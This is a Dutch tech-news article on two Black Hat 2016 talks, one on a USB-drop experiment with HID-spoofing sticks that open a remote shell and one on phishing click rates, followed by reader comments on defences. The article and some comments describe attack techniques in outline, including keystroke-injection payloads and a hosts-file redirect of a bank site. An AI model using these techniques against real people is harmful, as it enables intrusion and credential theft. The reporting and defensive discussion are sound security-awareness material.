Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 165 reacties

Ook dit jaar vindt de Black Hat-beveiligingsconferentie plaats in het Amerikaanse Las Vegas en Tweakers is op locatie aanwezig. De eerste dag kende een groot aantal uiteenlopende presentaties, waarvan er twee een gemeenschappelijk thema hadden: nieuwsgierigheid. Zowel Elie Bursztein, beveiligingsonderzoeker bij Google, en Zinaida Benenson, wetenschapper aan de Duitse Erlangen-Nürnberg-universiteit, stelden de menselijke factor centraal in hun presentaties.

blackhat 2016

Usb-sticks

Bursztein ging in op de vraag 'does dropping usb drives really work?'. Hij vertelde dat bij elke beveiligingsconferentie er altijd wel iemand is die claimt dat hij de beveiliging van een bedrijf heeft omzeild door een usb-stick buiten het gebouw op een opvallende plek neer te leggen in de hoop dat een medewerker deze in een pc plugt. Deze aanval zou zo effectief zijn, dat hij op een gegeven moment zelfs terugkwam in de tv-serie Mr. Robot. Daar is in een bepaalde scène te zien hoe een beveiliger een kort daarvoor op de parkeerplaats gevonden usb-stick aan zijn computer hangt, zonder te weten dat de drive daar met een reden lag.

Genoeg aanleiding voor de Google-onderzoeker om zelf een experiment op te zetten en deze claim te onderzoeken. Daarvoor verspreidde hij 297 geprepareerde usb-sticks over de campus van de Amerikaanse universiteit van Illinois, om gevonden te worden door voorbijgangers. Daarbij maakte hij onderscheid naar locatie, uiterlijk en inhoud van de stick en kon hij de resultaten bijhouden via een backend. Nadat personen de inhoud van de stick bekeken hadden, konden zij een enquête invullen en aangeven welke beweegredenen zij hadden.

Mogelijke aanvallen

Bursztein onderscheidt drie mogelijke aanvallen die via een usb-stick uitgevoerd kunnen worden. Een eerste is volledig gebaseerd op social engineering en bestaat bijvoorbeeld uit het plaatsen van kwaadaardige bestanden met de naam 'do not open', of iets anders aantrekkelijks. Deze aanval wekt echter al snel argwaan en is niet zeer betrouwbaar. De tweede mogelijkheid is het zogenaamde hid spoofing, waarbij de gegevensdrager zich voordoet als een human interface device; in de meeste gevallen is dat een toetsenbord. Op die manier kan er via toetsenaanslagen een commando worden uitgevoerd; bijvoorbeeld het openen van een remote shell.

blackhat 2016

Het lastige bij een dergelijke aanval is dat het besturingssysteem van het slachtoffer vastgesteld moet worden alvorens de aanval uitgevoerd kan woorden. Daarbij moet de payload die zorgt voor het openen van de opdrachtprompt klein zijn en niet door een antivirusprogramma worden herkend. Ook moet de usb-stick er geloofwaardig uitzien.

Voor al deze problemen heeft de onderzoeker echter een oplossing weten te vinden. Via het virtueel indrukken en vastzetten van de 'scroll lock'-toets kon hij op een snelle manier het besturingssysteem van het slachtoffer vaststellen. Ook een kleine payload bleek haalbaar te zijn. Zo was het mogelijk via scripttaal een Linux-payload van honderd tekens te schrijven. In Windows was het proces iets complexer, maar ook niet onmogelijk. Het fabriceren van een usb-stick kostte Bursztein ongeveer 40 dollar per apparaat op basis van een Teensy 3.2.

De uiteindelijke aanval demonstreerde hij in een video. Daarin was te zien dat het hele proces van het inpluggen van de usb-stick tot het openen van een shell en verbinding leggen met een command-and-control-server op basis van metasploit ongeveer zes seconden duurde, waarbij de gebruiker alleen kort een opdrachtprompt ziet verschijnen. Daarna had hij vrije toegang tot de geïnfecteerde computer.

De derde manier om een usb-stick voor een dergelijke aanval te gebruiken is door via een zero day-kwetsbaarheid toegang tot een apparaat te krijgen. Deze manier is echter zeer kostbaar en omslachtig, waardoor deze alleen is weggelegd voor zeer toegewijde aanvallers, zoals een staat.

Bursztein heeft de code van zijn project online beschikbaar gemaakt. Ook ging hij uitgebreid in op het fabriceren van een usb-stick op basis van een Teensy met een overtuigend uiterlijk. Hierbij maakte hij gebruik van een mal van silicoon, wat hem in het begin niet meeviel. Uiteindelijk lukte het echter om goede exemplaren te maken. De onderzoeker overweegt een Kickstarter-project voor dit soort usb-sticks te beginnen als er genoeg interesse voor is.

Nieuwsgierigheid

Terug naar de resultaten van het uitgevoerde onderzoek. Het bleek dat 98 procent van de neergelegde usb-sticks was opgeraapt en dat 48 procent daarvan aangesloten werd op een computer, iets wat Bursztein niet had aan zien komen. Ook bleek dat het niet uitmaakte op welke plek de usb-stick werd neergelegd, bijvoorbeeld op een parkeerplaats, in een gemeenschappelijke ruimte of op een gang. Ook het uiterlijk maakt niet veel uit, bijvoorbeeld of er sleutels aanhangen of er een label opgeplakt is.

De grootste reden voor het openen van de bestanden op de drager bleek het identificeren van de eigenaar te zijn, verklaarden de vinders. Bursztein heeft bij deze verklaring echter zijn twijfels, omdat uit zijn data blijkt dat veruit de meeste personen alleen de foto's hadden geopend en niet de overige bestanden. De reden die daarna het vaakst genoemd werd is dan ook nieuwsgierigheid, iets dat Bursztein een stuk aannemelijker acht.

blackhat 2016

Het tweede onderzoek, dat van Benenson, richtte zich op het verschijnsel van phishing. Zij wilde onderzoeken wat de redenen zijn om op verdachte links te klikken. Daartoe stuurde zij 1600 studenten een Facebook-bericht of een e-mail van een onbekend persoon met daarin een link naar foto's van een nieuwjaarsfeest. Daarbij werd het verzoek meegestuurd de foto's niet te delen. Het aantal kliks werd vervolgens door de onderzoeker vastgelegd.

Het bleek dat 43,5 procent van de studenten op de link in het Facebook-bericht klikte en 25 procent op de link in de e-mail. Toen Benenson de studenten op een later tijdstip benaderde, bleek dat de grootste reden voor het volgen van de link nieuwsgierigheid was. Dit werd in 34 procent van de gevallen als reden aangevoerd. De daaropvolgende reden was dat de studenten dachten dat het inderdaad foto's van een feest waren dat zij hadden bijgewoond. Redenen voor het niet-klikken waren het niet-kennen van de afzender en het vermoeden dat het om spam of phishing ging.

blackhat 2016

Benenson voert aan dat gebruikers eigenlijk de hele tijd in een soort 'James Bond-modus' moeten verkeren: constant alert dat iets niet is wat het lijkt. Zij begrijpt echter ook dat dit niet van iemand gevraagd kan worden.

Oplossingen

De oplossingen die de twee onderzoekers aandragen, hebben raakvlakken met elkaar. Beiden noemen dat het creëren van bewustzijn bij gebruikers een belangrijke rol speelt. Zo noemt Benenson dat het alleen noodzakelijk is om achterdochtig te worden als daar een geldige indicatie voor is. Ook onderkent zij dat het onderdrukken van nieuwsgierigheid geen optie is, omdat dit nu eenmaal inherent is aan de mens. Zij roept dan ook op om in gesprek te gaan met gebruikers, bijvoorbeeld medewerkers van een bedrijf die dagelijks berichten van buitenaf verwerken.

Bursztein noemt dat er ook specifieke manieren zijn om je tegen een aanval via een usb-stick te verweren, maar dat deze niet altijd even goed werken. Zo is het bijvoorbeeld mogelijk om de usb-poort op computers te blokkeren. Daarnaast is er de optie om via systeembeleid alleen bepaalde usb-sticks toe te laten. Dit kan echter misgaan op het moment dat de id van een apparaat wordt vervalst, wat niet heel moeilijk is. Ook helpen antivirusprogramma's niet tegen een dergelijke aanval, omdat er alleen tekst wordt ingevoerd.

Absolute beveiliging is dus een utopie en de menselijke factor blijft een heikel punt als het gaat om het beveiligen van systemen. Nieuwsgierigheid zal daarbij altijd een belangrijke rol blijven spelen.


Moderatie-faq Wijzig weergave

Reacties (165)

Geeft dit alles niet het failliet van de huidige OS'en? Mogelijk dat zakelijke gebruikers meer op hun hoede zijn, maar hele volksstammen met home PC's zijn de zwakke schakel. Hoor nu al om mij heen dat mensen hun buik vol hebben van Windows. Je doet niks en je pc staat vol met allerhande troep.
Geeft dit alles niet het failliet van de huidige OS'en?
Ik ben het helemaal met je eens.

Een hoop Tweakers hier zullen gaan roepen dat het aan de mensen zelf ligt, dat ze niet slim, voorzichting, opgeleid genoeg zijn. Dat dit of dat nodig is. Dat ze zelf nergens problemen mee hebben.

Maar het ligt aan het OS. MicroSoft en Apple hebben het slechte voorbeeld gegeven. Door gebruikers-gemak boven alles te stellen. Android, Linux, applicaties, de rest volgt. De gebruiker hoeft alleen nog maar met zijn hoofd lichtjes ja te knikken, en alles gebeurt volautomatisch. Handig. Maar de gebruiker geeft alle controle over zijn machine weg. Aan de OS-fabrikant, aan de fabrikanten van apps, aan websites, aan hackers en malware, aan alles. De gebruiker is de laatste die gevraagd wordt wat er moet gebeuren.

Voor mij begon het allemaal met het mixen van data en programmatuur.

Als je dat verschil goed in de gaten kunt houden, wordt alles een stuk minder gevaarlijk. Echter, MS en Apple zijn begonnen met die twee door elkaar te halen. Een word-document bleek macros te kunnen bevatten, die commandos en programmas konder uitvoeren. Helemaal foute boel, in mijn ogen. Maar het werd geaccepteerd door iedereen. Opeens wist je niet meer of een simpele brief slechts passieve data was, of dat het een actief programma kon zijn. Microsoft maakte het default zo dat je filenaam extensies niet meer kunt zien. Moet je eerst aanzetten. Dus ziet de gewone gebuiker het verschil niet meer tussen: gratis-geld.doc en gratis-geld.exe. Ik kreeg laatst een zip met een gratis-geld.wsf. Eigenlijk zou het OS direct moeten laten zien (kleurtje ?) of een filename-extensie data of programmatuur is.

En toen kwam het web. Javascript. ActiveX, nog grotere zooi. Hele java-applicaties die gedownload en gerund worden. Zijn ze helemaal gek geworden ? Prachtig ja. Dingetjes die bewegen en draaien op m'n scherm. Maar van mij had het niet gehoeven. Ik wil dat mijn web-paginas 100% passief zijn. Altijd. En dat als er actie moet worden ondernomen, ik ergens eerst 1x of 2x op moet klikken. Ik wil dat ik altijd het verschil weet tussen een actieve web-pagina (een programma) en een passieve (data). Is dat zo'n moeilijk concept ?

Om terug te komen op de USB-stick uit het artikel. Een USB stick is eigenlijk altijd passief. Je computer (of tablet/telefoon) kan er van lezen. Een USB stick zou nooit iets actiefs moeten kunnen doen. Als je USB-stick dat wel probeert, of zich voordoet als iets anders dan een passief device, zouden er direct warning-popups moeten zijn om je te vragen of je echt een toetsenbord of muis aan je PC wilt verbinden. Nu is alles "voor het gemak". En wordt er dus gewerkt volgens het principe "de gebruiker hoeft niets te weten, niets te doen, niets te beslissen". Helemaal fout, imho.

Nog iets over webbrowsers. Je zou in theorie een webbrowser in een VM of een container kunnen laten draaien. Afgeschermd van je echte PC of telefoon. Heel veilig, lijkt me. Als je dan iets wilt downloaden, moet je het eerst binnen je VM of container downloaden, en daarna zelf (niet automatisch dus) copieeren vanuit de container naar je echte PC. Iets meer werk, maar 100% meer safe. Waarom hebben we die optie nog niet ? Waarom is het niet zo simpel als een vinkje aanvinken tijdens de installatie van Chrome, FireFox of Safari ?

De laatste stap zijn de "app-developers". Dat zijn imho de allergrootste smeerlappen. Apps installeren om data te bekijken die je net zo goed via een passieve webpage kunt bekijken. Maar ja, dan kan de app-developer niet direct alle persoonlijke data van je telefoon of tablet aftrekken. Dus wordt iedereen wijs gemaakt dat het de gewoonste zaak is om de weersverwachting via een app te kijken. Alsof webpaginas achterlijk zijn, en alleen nog maar voor bejaarden.

Ben ik nu de enige die er zo tegen aan kijkt ?
Is mijn idee van actieve software en passieve data nu zo achterlijk ?
En die vraag of je echt een keyboard/muis met je pc wilt verbinden ga je beantwoorden met?
Doet me denken aan "Keyboard error, press F1 to continue"
Als je nu een USB-apparaat aansluit, zie je hooguit wat kleine meldingen in je tray dat er iets aangesloten of geinstalleerd is.
Bij invoerapparaten zou je bijvoorbeeld een prominentere popup kunnen tonen:

U heeft een toetsenbord aangesloten. Over 30 [countdown] seconde kunt u dit apparaat gebruiken, of klik op Ok om het direct te gebruiken.
Heeft u geen toetsenbord aangesloten, klik dan op Cancel, of verwijder het USB-apparaat binnen 30 seconde.
En die vraag of je echt een keyboard/muis met je pc wilt verbinden ga je beantwoorden met?
Met de muis/keyboard die al is geconfigureerd, Of je laat het automatisch inpluggen van nieuwe peripherals alleen toe tijdens de eerst 10 seconden na reboot. Of je houdt bij (op disk) welke devices er in een PC zitten, en vraagt confirmatie als er iets veranderd. Er is van alles mogelijk om het safer te maken.
Alleen zie ik dat je aan enkele dingen wel heel snel voorbij gaat. Een aanvalsvector die we de laatste jaren regelmatig hebben gezien loopt via PDF bestanden. Dit zijn geen exe's, dit is geen programmatuur maar pure data bestanden die zo zijn opgesteld dat ze een bug in Adobe Reader misbruiken om alsnog code uit te voeren. Je opdeling tussen data en programmatuur gaat dus al niet meer op.

Java applicaties... zoals de naam zelf al aangeeft heb je daar al geen data meer maar een programma. Nu denk ik dat je javascript bedoelt waarmee het mogelijk was om meer interactiviteit in je webpaginas te steken. Wil jij dat alles wat interactief is geactiveerd moet worden? Zoek je dan een plugin die dat voor je doet. Javascript op zich is niet inherent gevaarlijk en de interactiviteit is net iets wat contentmakers gebruiken.

Een USB stick die zich voor doet als iets anders kan niet herkend worden door de computer. Dat regel je op hardware niveau en is niets anders dan wanneer je zelf een extra toetsenbord zou insteken. Je PC ziet niet dat je een USB stick insteekt waarna je een toetsenbord te zien krijgt. Voor zover de PC weet heb je net een USB hub ingestoken met daarop meerdere apparaten aangesloten.

Je idee is zeker niet achterlijk, maar staat gewoon de productiviteit en de werkbaarheid van het systeem in de weg. Mensen willen iets dat gewoon werkt en niet dat ze eerst honderd handellingen moeten uitvoeren voordat iets kan doen wat ze willen dat het doet.
Een aanvalsvector die we de laatste jaren regelmatig hebben gezien loopt via PDF bestanden. Dit zijn geen exe's, dit is geen programmatuur maar pure data bestanden die zo zijn opgesteld dat ze een bug in Adobe Reader misbruiken om alsnog code uit te voeren. Je opdeling tussen data en programmatuur gaat dus al niet meer op.
Jij hebt het over bugs. Bugs zijn er altijd. Bugs zijn te verhelpen. Ook al loop je achter soms de feiten aan, er is in ieder geval hoop.

Ik heb het over architectuur. Design. Hoe design je de software ? Hoe steekt het grote plaatje in elkaar ? Als je al begint met data en programmatuur op een grote hoop te gooien, dan heb je nooit meer kans om het goed te doen. Alle hoop is verloren.

BTW, ik had het over zowel Javascript als Java zelf. Misschien zie je het tegenwoordig niet meer zo veel, maar 10 jaar geleden waren er webpaginas die alleen functioneerden als je de Java Runtime Environment installeerde, en je echte Java programmas runde die op webpaginas stonden. Misschien bestaan die nu niet meer, ik weet het niet. Ik heb 5 jaar geleden Java van mijn PC geflikkerd, die rotzooi komt er bij mij niet meer op. Ik heb dus geen idee meer of er zulke webpaginas met embedded Java bestaan. Ik hoop het niet.

[Reactie gewijzigd door gryz op 7 augustus 2016 16:30]

Zijn idee is zeker niet achterlijk! Dat zeg je 'goed'... Je gaat erg snel aan het feit voorbij dat mensen veiligheid willen boven je genoemde gemak. Dit was toevallig ook het onderwerp...

Het USB protocol is nog steeds een 'gat in de markt'. En ik ben het helemaal met gryz eens. Het mengen van data en programma code. Stom plan... Het de gebruiker zo gemakkelijk mogelijk maken en zaken verbergen zoals extensies... Een heel goed voorbeeld van hoe het niet moet. App developers zijn inderdaad soms (of vaak) smeerlappen... Wat ik op smartphones (ios of android) tegen ben gekomen is echt te droevig voor woorden. Soms vraag ik mijzelf wel eens af... Wat zijn dit voor een mensen? Daarintegen die eikels (lees: noob computer gebruikers) die gevonden USB sticks overal maar gewoon zo insteken om de eigenaar te kunnen achterhalen... Doen ze dat ook met hun Pie....???

[Reactie gewijzigd door 66431 op 9 augustus 2016 00:01]

Ik vind de ontwikkeling van Wayland op Linux wel interessant op dit gebied. Wayland is bedoeld als opvolger van X(org), een component vergelijkbaar met Windows DirectX. Met betrekking tot beveiliging maken ze enkele rigoureuze ontwerpkeuzes.
Reagerend op wat geschreven was: in essentie is het heel efficiënt om (welk programma dan ook) toegang te geven tot zulke laag mogelijke bronnen, zo dicht mogelijk op de hardware. In dit licht vind ik het jammer dat apps misbruikt worden zoals jij aangeeft. Ook vind ik het jammer dat er zoveel aanvallen zijn, dat het inderdaad slim is om tussen browser en computer een extra laag, een VM, te stoppen.
Ik vind het een interessant idee om een onderscheid te maken tussen 'actieve' websites en 'passieve' websites. Tegenwoordig kan veel van de layout met CSS gedaan worden, en zelfs "bewegende" menu's zijn daarmee mogelijk; maar voor veel taken die men als layout zou beschouwen is CSS ontoereikend, en word JavaScript ingezet (m.n. bepalen hoe groot bepaalde elementen op het scherm zijn). Daar zou dus ook een nieuwe document/layout taal op zijn plaats zijn, vind ik.
Het is altijd wel af te schuiven op een OS, echter heeft het ook met de mens zelf te maken; hoe goed denk je na voordat;
  • Je een USB stick zomaar in je PC drukt.
  • Je zomaar verbind met het eerste de beste gratis Wi-Fi hotspot.
  • Je klikt op een linkje van een niet bekende afzender.
  • Je klikt op een linkje van een wél bekende afzender maar je iets niet verwacht.
  • Je zomaar je login gegevens invult op een fake website waarbij de URL net legitiem lijkt.
Over dat laatste, als je dat combineert met een USB stickje die de hosts-file van je OS aanpast, dan kan je bijvoorbeeld zelfs ing.nl omleiden naar een fake server waardoor jij een volledig legitieme website te zien krijgt. Daar is het ook weer aan de mens zelf dat er een geldig SSL certificaat op de site getoond wordt. (Groen slotje met de juiste gegevens van in dit geval "ING BANK N.V."

Zulke exploits worden vaak gedicht, soms horen ze ook bij de gebruikers ervaring en kan het niet gedicht worden. In het eerste geval komen er wel weer nieuwe exploits. Daarom moet je als gebruiker echt bij jezelf beginnen.
Ik heb me jaren geleden al aangeleerd om elk device wat ik aansluit waarop data kan staan eerst te laten scannen voordat ik welk bestand dan ook aanklik. Daarmee ondervang ik dus al een heleboel. Het werkt alleen dus niet tegen automatisch geladen data. Hoe voorkom ik dat dan? Ik raap geen usb-sticks op van de straat, maar er is altijd wel een schoonvader, collega, vriend die even zijn stickje in de laptop wil steken. Daarop kan dus ook al vanalles staan.
Je kunt een USB stick in een kale PC stoppen, waar dus alleen windows of linux op staat en geen netwerkverbinding heeft, en dan vervolgens een scan uitvoeren. Mocht je dat niet kunnen, dan weet je dus dat de USB stick al geinfecteerd is.

Je hebt verder nooit 100% garantie, er kan een virus/exploit op staan die nieuw is en/of nog niet in de database zit van jouw virusscanner. Maar dit is zo ongeveer het beste wat je kunt doen als persoon zijnde. Een speciaal beveiligingsbedrijf kan data van de USB stick af lezen als je het echt zeker wilt weten, maar daar betaal je dan wel veel voor.

Zo'n bedrijf doet dat bijvoorbeeld met een custom OS, die bijvoorbeeld heel andere commando's heeft dan windows/iOS/Linux, dan kan een USB stick alsnog vragen "cmd.exe shutdown -s" (om maar een simpel voorbeeld te geven) maar dat wordt dan uiteraard niet geaccepteerd.

Een alternatief van zo'n bedrijf en wat je zelf ook wel kunt doen met wat behendigheid, is policies aanpassen van jouw user en SYSTEM waarbij je aangeeft dat ze geen programma's mogen opstarten. Een klein foutje maken in policies kan betekenen dat je je PC niet meer kan opstarten zonder een boot disk of een speciale admin account, dus hier is wel ervaring gewenst.
Bedankt.

Laten we ervan uit gaan dat ik geen specialistische kennis heb en niet in de mogelijkheid ben om voor elke usb-stick / dvd / enz die mij wordt gevraagd in de laptop te gebruiken naar een gespecialiseerd (en duur!) bedrijf te gaan.

Wat is dan best practice?

Mijn virusscanner is altijd ge-update, mijn windows/office zo mogelijk ook. En dan?
Wat zet ik aan/uit, wat doe ik wel/niet om dit soort ellende te voorkomen? (Anders dan wat ik nu dus al doe.)
Simpel antwoord:

Niet allerhande USB sticks in je PC proppen buiten je eigen stickjes. Gebruik cloud diensten om het e.e.a te delen, zoals Dropbox of WeTransfer. Daar zijn ze voor.
Even chargeren hoor:

Dus als je zwager even zijn vakantiefoto's wil laten zien, moet je hem weigeren zijn usb-stick in je pc te prikken, maar eerst terug naar huis sturen, daar zijn foto's uploaden, waarna ik ze weer download. In de praktijk gaat dat niet werken, of krijg je scheve gezichten onderling.

Daar maken hackers en virusmakers dus weer handig gebruik van.
Sowieso is het delen van foto's online toch veel handiger :)

Maar ik denk, ik mijn geval (en misschien meer tweakers) , dat je zeer zeker niet usb van je familie moet gebruiken :Y)
"Zeer zeker niet USB van familie gebruiken", denk dat ik me daar niet bij aansluit.

Ik zou wel even vragen of ze de stick gekocht hebben en weten waar 'ie allemaal in geweest is maar pertinent weigeren... Nee, denk niet dat ik het kleine risico zwaarder weeg dan een fatsoenlijke relatie met familie.

Jaren lang op middelbare en vervolg opleiding/werk gewerkt met USB sticks waar ik bij god niet van wist waar ze vandaan kwamen en nooit issues gehad. En zeker dat ik destijds een stuk makkelijker was omtrent IT safety practices en meer risico liep dan nu. Nee; die 0.01% kans op een infectie weegt echt niet op tegen het weigeren van familie sticks.
Dat is een afweging die iedereen voor zichzelf moet maken. Ik ben ook niet happig op USB-sticks en gebruik zo ook bijna nooit. Zeker niet nu alles snel en eenvoudig online kan.

Nooit issues hebben gehad betekent niet dat je systeem nooit uitvoerig is bekeken door iemand waarvan je dat niet wilt. Of je daar ooit nog last mee krijgt, zal in de toekomst blijken. Als een hacker netjes zijn werk doet, merk je er niets van, afhankelijk van wat 'ie met je systeem of je gegevens wil. ;)

Het weigeren van USB-sticks, of het nu vrienden, familie, of onbekenden zijn: die argwaan zal de komende jaren nog moeten groeien. Een cultuurdingetje, we zullen zien. :)
Als iemand foto's komt showen dan drukt ie de stick maar in de TV.

Maar snap je voorbeeld wel, maar qua veiligheid zal je toch echt bij jezelf moeten beginnen.
Een Smart TV die in hetzelfde netwerk hangt als je desktop kan prima als stepping stone gebruikt worden om bij overige systemen te komen.
Edit: Verkeerde reactie.

[Reactie gewijzigd door iinnc. op 8 augustus 2016 15:55]

Je zou de usb-poort vast kunnen toewijzen aan een virtual machine. Zodat bij aankoppeling op de poort de VM in de weer gaat met de gegevens. Dan open je de stick als het ware in een sandbox omgeving.
Dit is in principe niet veilig;

1.) Er zijn virussen/exploits die een sandbox escape kunnen doen, deze zijn wel zeldzaam maar wil je echt het 1% risico lopen dat je perongeluk een cryptolocker op je PC zet?

2.) Veel van deze USB exploits worden op driver-niveau gedaan. Daarom zijn deze ook zo gevaarlijk, want ze kunnen al op je PC staan op het moment dat je de USB stick er in doet; een virusscanner is dan dus al te laat ook al kennen ze de virus en zetten ze het in quarantaine/verwijderen (De schade is dan al gedaan zeg maar).
In Zekere zin ben je nooit veilig, echter in je reactie op stiefjobs geef je aan dat je zonder pad naar het bestand f'd bent. Bij een sandbox escape vanuit de VM is er inmiddels een pad bekent. En op het hostsysteem gebruik je uiteraard meer beveiliging. Zoverre dat mogelijk is. Waardoor je eventuele escapes al snel kan oplossen.
Ja, dat weiger je dan. Ik sluit mijn hardware ook niet aan op die van andere mensen.
Een stapje verder dan je eigen voorstellen en die gegeven door andere reageerders is CIRCLean.

Het is een hardwarematige oplossing om de gegevens op onbekende of onbetrouwbare USB sticks op veilige wijze op een tweede, betrouwbare USB stick te plaatsen.
Wat je zou kunnen doen is eerst zelf een speciaal besturingssysteem opstarten in plaats van Windows/etc. Dat kun je op een DVD of op een USB-stokje van jouzelf zetten en de computer met dat besturingssysteem opstarten. Dan steek je het enge USB-stokje erin en kopieer je de bestanden ervan naar je harde schijf (of naar een ander USB-stokje), terwijl je nog steeds in het andere besturingssysteem bent. Dan koppel je het enge stokje los, en start je je computer opnieuw op in Windows/etc. Het is wel belangrijk dat het systeem dat je kiest niet toestaat dat er code op gedraaid wordt, het moet heel beperkt zijn.
Dit vind ik zelf een van de beste oplossingen die nog redelijk laagdrempelig is. Dan bedoel ik dat je geen rare fratsen hoeft uit te halen met hardware, maar gewoon een linux distro naar keuze vanaf USB boot. Uiteraard op een zeer beperkte account, wat je al aangaf, zodat je harde schijven die in je computer hangen met je kostbare data niet alsnog gemount worden door de usb-stick(hid-spoofer) payload.

Daarnaast verwacht je familie dat ze gewoon even op jou account kunnen surfen op het web en even door hun mailbox kunnen gaan en zo allerlei van hun eigen rommel kunnen aanklikken. Ik denk als je conflicten met je familie wilt vermijden dat je het beste een tweede systeem kan gebruiken voor wanneer je familie komt :*) maar dan moet je ook nog iets gaan doen met de internetverbinding van deze machine. In een afgescheiden netwerk over een VPN verbinden met het internet oid. Leuke hobby voor als je veel tijd over hebt!
Heb jij toevallig een idee voor een OS dat extreem beperkt is (alleen bestanden kan verplaatsen) en dus niet kwetsbaar is voor malware via USB? De bovengenoemde aanval werkt namelijk ook op Linux, door als toetsenbord herkend en geaccepteerd te worden...
Ik denk dat bijna elke linux distro zo te configureren is dat je usb HID devices kan blocken via udev. Ik had een idee om via udev nieuwe usb hid devices te blokkeren, na even te googlen bleek er al iemand exact hetzelfde te hebben gedaan: http://security.stackexch...-attacks-on-linux-desktop

Hiermee ben je nog niet volledig veilig, dit gaat alleen over HID devices blokkeren. De vraag die dan bij mij opkomt: kan dat malafide usb device zichzelf rebooten en als usb netwerk adapter terug komen? Of misschien als een andere usb class die schade aan kan richten via een nog niet bedachtte truuc.

In bovenstaande uitleg zie je wel dat je nog steeds als mens moet opletten: via udev wordt geblokkeerd, maar bij afsluiten wordt unlocked, zodat bij de volgende start jou muis en toetsenbord (en andere vertrouwde apparaten) weer kunnen verbinden, hoe bedien je anders je computer...? Hier is ook weer een window voor een aanvaller om naar binnen te komen...

Ik ga bovenstaande zelf eens proberen in een VM om te kijken wat er mogelijk is om het user-friendly te maken: als je hierdoor alle HID-based aanvallen kan tegenhouden ben je al een stuk veiliger.
Hee, nieuwe HID blokkeren is een goed idee. Dan ben je in elk geval beschermd tegen Bad USB.

Is het niet mogelijk om alle soorten USB-devices te blokkeren behalve mass storage (of hoe heet dat?)?
Wat ik mij afvraag is of het nuttig is om de foto's of muziek van een USB stick eerst te kopiëren naar een Settopbox en deze dan vervolgens via een eigen USB stick over te zetten op je PC.

Is het mogelijk om via een Settopbox alle virussen eruit te filteren?
"Het werkt alleen dus niet tegen automatisch geladen data."
De meeste anti-virus en anti-malware software heeft een live-protection. Dat betekent dat ook data die uitgevoerd gaat worden, eerst gescand wordt op virussen en malware.

Evenzo worden bestanden die je download gescand door je browser voordat je ze kan openen/opslaan.
Maar dit werkt dus heel anders dan een file die je even download. Een file die je download kan zichzelf niet opstarten, daar moet je op klikken.

Hier hoef je alleen de USB stick er in te stoppen en het start zichzelf dan op. Dit gebeurt voor een live-protection van een virusscanner.

Ik kan het het beste omschrijven als dat een virusscanner een bestand pas kan scannen als die het pad weet van het bestand, dus zeg dat de USB stick een G: drive wordt en daar een mapje genaamd \vakantiefotos\ heeft staan waar de virus ook in staat, voor het gemak virus.exe (Met automatisch geladen data ligt het ingewikkelder maar als voorbeeld doen we het zo).

Nu stop je de USB stick in je PC. Nu start de virus al voordat de computer kan zeggen "Er is een nieuwe removable drive genaamd g:\". Een virusscanner scant nu pas de drive want die bestond net nog niet, terwijl de USB er al wel in zat.

Er zijn voor zover ik weet nog geen preventieve programmas tegen deze autoloaders, het zou kunnen dat virusscanners deze later wel krijgen. Bijvoorbeeld dat de virusscanner dan de USB driver krijgen ipv het OS en dan het dan eerst door de virusscanner heen gaat voordat windows er wat mee mag doen.

Ook dan bestaat het gevaar dat virusmakers een "sandbox escape"-esque exploit gaan ontwikkelen om van de virusscanner af te komen.
"Maar dit werkt dus heel anders dan een file die je even download."
Dat was slechts een tweede voorbeeld. Daarvoor schreef ik:
De meeste anti-virus en anti-malware software heeft een live-protection. Dat betekent dat ook data die uitgevoerd gaat worden, eerst gescand wordt op virussen en malware.

"Hier hoef je alleen de USB stick er in te stoppen en het start zichzelf dan op. Dit gebeurt voor een live-protection van een virusscanner."
Nee, de computer bepaalt wat er opgestart wordt. AV-software kan zich daar mee bemoeien.
https://en.wikipedia.org/...ware#Real-time_protection
Malware is tegenwoordig veel efficienter. Het kan zichzelf in de firmware van de USB manifesteren en dat betekent dat de virusscanner er te laat bij zal zijn, ook met zijn real-time protection.

http://security.stackexch...before-opening-its-folder

Een virus op driver/firmware niveau kan momenteel simpelweg niet op tijd worden gedetecteerd. De schade kan wel worden beperkt of genullificeerd (als de virus een cmd.exe moet openen en je hebt deze hernoemd, simpel voorbeeld en risico van dien) maar dan zit de virus nog steeds in de firmware van je USB stick.

Een virusscanner kan deze dan ook niet verwijderen, hier zul je een flash voor moeten doen en de firmware herinstalleren. Real-time protection is een goede tool, maar het kan je de illusie geven dat je altijd veilig bent.
Interessant om te weten dat dat kan. Maar het is nogal theoretisch, niet waarschijnlijk dat je dat in de praktijk tegenkomt. Het verspreiden van het virus wordt op die manier ook wel erg omslachtig.
nieuws: Spionagegroep infecteert offline-computers via usb-sticks

Theoretisch? In de praktijk tegenkomt zeg je? Omslachtig?

Zie hier een ander voorbeeld van hoe het dus ook kan, gewoon een partitie die windows niet kan zien, success met je realtime protection.
Niet alleen storage devices. Wantrouw vooral ook bijvoorbeeld toetsenborden of zelfs de (stroom)kabels zelf!
https://www.linkedin.com/...-malicious-mark-goldstein
Let's Encrypt geeft helemaal geen EV certificaten uit, zelfs geen OV.. Sterk verhaal.
Ik zeg niks over EV of OV, ik zeg alleen dat er een groen slotje staat.

Tweakers.net heeft ook een groen slotje.
Mogelijk dat zakelijke gebruikers meer op hun hoede zijn
Hahaha! Zeker nog nooit in de IT gewerkt... Gezien de schade die een zakelijke gebruiker kan aanrichten zou je denken dat ze veel voorzichtiger zijn. Op echt alle niveau's valt dat enorm tegen. Van directeuren tot domme blondjes (male and female) van de schoonmaakdienst. Natuurlijk niet iedereen, maar genoeg.

Het is aan de IT afdeling/leverancier om dit zo veel mogelijk te voorkomen en dan kom je in de discussie van security vs. usefullness. Mensen die geen applicaties kunnen installeren op hun laptop worden in veel gevallen niet vrolijk. Maar ze worden nog minder vrolijk van een super trage laptop vol met malware of een cryptolocker.

Dat zo goed mogelijk beveiligen en gebruikers ontzorgen kost natuurlijk geld, waar men pas na schade en schande geld in wil steken.

Thuis gebruikers hebben die IT afdeling over het algemeen niet standaard in huis...
En daarom mag het personeel nooit fysiek of online ergens bij. Ze krijgen net genoeg rechten om hun werk te doen, en that's it. Op zich prima te regelen als de computer niet als computer gebruikt hoeft te worden maar alleen voor bepaalde software. Een full-screen kassa app bijvoorbeeld. Of alleen kantoorsoftware.
